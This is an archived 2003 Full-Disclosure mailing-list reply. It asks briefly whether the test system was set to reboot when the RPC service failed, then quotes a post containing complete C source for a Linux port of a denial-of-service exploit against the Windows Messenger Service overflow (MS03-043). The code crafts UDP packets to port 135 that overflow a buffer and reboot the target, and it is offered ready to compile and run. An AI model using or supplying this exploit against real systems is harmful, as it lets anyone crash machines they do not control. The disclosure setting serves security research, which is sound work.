RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

From: Dowling, Gabrielle (dowlingg_at_sullcrom.com)
Date: 10/20/03

  • Next message: Kain: "Re: [Full-Disclosure] Windows covert channel" 
    To: "VeNoMouS" <venom@gen-x.co.nz>, <full-disclosure@lists.netsys.com>
Date: Mon, 20 Oct 2003 00:28:35 -0400

    Was the win2k system you tested on set to have the rpc service reboot on fail, or was the reboot caused by some other oddity?

    G

     -----Original Message-----
    From: VeNoMouS [mailto:venom@gen-x.co.nz]
    Sent: Sun Oct 19 22:22:51 2003
    To: full-disclosure@lists.netsys.com
    Subject: [Full-Disclosure] Linux Ported Version of MS03-043 DOS

    Here you go guys or get it via www.gen-x.co.nz/ms03-043.c
     
    <<<<<<<<<<<<<<<<<< SNIP >>>>>>>>>>>>>>>>>>>>>>>>

    /*
    Mon Oct 20 14:26:55 NZDT 2003
     
    Re-written By VeNoMouS to be ported to linux, and tidy it up a little.
    This was only like a 5 minute port but it works and has been tested.
    venom@gen-x.co.nz
     
    greets to str0ke and defy
     

    DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
    Launching it one or two times against the target should make the
    machine reboot. Tested against a Win2K SP4.
     
    "The vulnerability results because the Messenger Service does not
    properly validate the length of a message before passing it to the allocated
    buffer" according to MS bulletin. Digging into it a bit more, we find that when
     
    a character 0x14 in encountered in the 'body' part of the message, it is
    replaced by a CR+LF. The buffer allocated for this operation is twice the size
    of the string, which is the way to go, but is then copied to a buffer which
    was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks
     
    and overflow the fixed size buffer.
     
    Credits go to LSD :)
     
    */
     
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    #include <time.h>
     
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <arpa/inet.h>
     
     
     
     
     
    // Packet format found thanks to a bit a sniffing
    static unsigned char packet_header[] =
    "\x04\x00\x28\x00"
    "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
    "\x4f\xb6\xe6\xfc"
    "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
    "\xff\xff\xff\xff"
    "\xff\xff\xff\xff"
    "\xff\xff\xff\xff"
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\xff\xff\xff\xff"
    "\xff\xff\xff\xff" // @74 : fields length
    "\x00\x00";
     
    unsigned char field_header[] =
    "\xff\xff\xff\xff" // @0 : field length
    "\x00\x00\x00\x00"
    "\xff\xff\xff\xff"; // @8 : field length
     

    int usage(char *name)
    {
     printf("Proof of Concept for Windows Messenger Service Overflow..\n");
     printf("- Originally By Hanabishi Recca - recca@mail.ru\n\n");
     printf("- Ported to linux by VeNoMouS..\n");
     printf("- venom@gen-x.co.nz\n\n\n");
     
     printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name);
     printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
     printf("-s <src netbios name>\n");
     return 1;
    }
     

    int main(int argc,char *argv[])
    {
            int i, packet_size, fields_size, s;
            unsigned char packet[8192];
            struct sockaddr_in addr;
      char from[57],machine[57],c;
            char body[4096] = "*** MESSAGE ***";
     
      if(argc <= 2)
      {
      usage(argv[0]);
      exit(0);
      }
     
        while ((c = getopt (argc, argv, "d:i:s:h")) != EOF)
      switch(c)
       {
       case 'd':
          strncpy(machine,optarg,sizeof(machine));
          printf("Machine is %s\n",machine);
          break;
       case 'i':
                memset(&addr, 0,sizeof(addr));
                addr.sin_family = AF_INET;
                addr.sin_addr.s_addr = inet_addr(optarg);
                addr.sin_port = htons(135);
          break;
       case 's':
                strncpy(from,optarg,sizeof(from));
          break;
     
       case 'h':
          usage(argv[0]);
          exit(0);
          break;
       }
          
            // A few conditions :
            // 0 <= strlen(from) + strlen(machine) <= 56
            // max fields size 3992
     
      if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); }
     
            if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); }
     
      if(!strlen(from)) strcpy(from,"tolazytotype");
     
            memset(packet,0, sizeof(packet));
            packet_size = 0;
     
            memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
            packet_size += sizeof(packet_header) - 1;
     
            i = strlen(from) + 1;
            *(unsigned int *)(&field_header[0]) = i;
            *(unsigned int *)(&field_header[8]) = i;
            memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
            packet_size += sizeof(field_header) - 1;
            strcpy(&packet[packet_size], from);
            packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
     
            i = strlen(machine) + 1;
            *(unsigned int *)(&field_header[0]) = i;
            *(unsigned int *)(&field_header[8]) = i;
            memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
            packet_size += sizeof(field_header) - 1;
            strcpy(&packet[packet_size], machine);
            packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
     
            fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
            memset(body, 0x14, sizeof(body));
            body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';
     
            i = strlen(body) + 1;
            *(unsigned int *)(&field_header[0]) = i;
            *(unsigned int *)(&field_header[8]) = i;
            memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
            packet_size += sizeof(field_header) - 1;
            strcpy(&packet[packet_size], body);
            packet_size += i;
     
            fields_size = packet_size - (sizeof(packet_header) - 1);
            *(unsigned int *)(&packet[40]) = time(NULL);
            *(unsigned int *)(&packet[74]) = fields_size;
     
            fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size);
     

     if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 )
      {
       perror("Error socket() - ");
       exit(0);
      }
     
            if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
      {
       perror("Error sendto() - ");
       exit(0);
      }
     

            exit(0);
    }

    **********************************************************************
    This e-mail is sent by a law firm and contains information
    that may be privileged and confidential. If you are not the
    intended recipient, please delete the e-mail and notify us
    immediately.
    ***********************************************************************

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Kain: "Re: [Full-Disclosure] Windows covert channel"

    Relevant Pages

    • Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS
      ... You have a win2k system that you haven't patched in ages and it rebooted when you threw. ... My initial query was because the messenger service has an rpc service that I'm not fully familiar with, buti would expect it to behave in accordance with rpc in general, which on win2k is to do nothing, rather than reboot. ... The buffer allocated for this operation is twice the ...
      (Full-Disclosure)
    • Re: [Testers wanted] /dev/console cleanups
      ... Making dmesg a shell script that just cats that file satisfied everyone who asked. ... At least one BIOS SDK specifically describes this as a feature. ... One of which is specifying which chunks of memory should be preserved after a reboot, up to "memory tests should be as non-destructive as possible". ... the dmesg buffer is a simple ring buffer in the kernel. ...
      (freebsd-hackers)
    • Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS
      ... to tell u the true, i ant a wintendo whore, i just applied patches ages ago, ... Was the win2k system you tested on set to have the rpc service reboot on ... "The vulnerability results because the Messenger Service does not ... The buffer allocated for this operation is twice the ...
      (Full-Disclosure)
    • Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS
      ... service recovery steps: ... >My initial query was because the messenger service has an rpc service that I'm not fully familiar with, buti would expect it to behave in accordance with rpc in general, which on win2k is to do nothing, rather than reboot. ... The buffer allocated for this operation is twice the ...
      (Full-Disclosure)
    • Re: printer lost on reboot
      ... youtan wrote: ... > Every time I reboot my Win2k system my local printer stops ...
      (microsoft.public.win2000.general)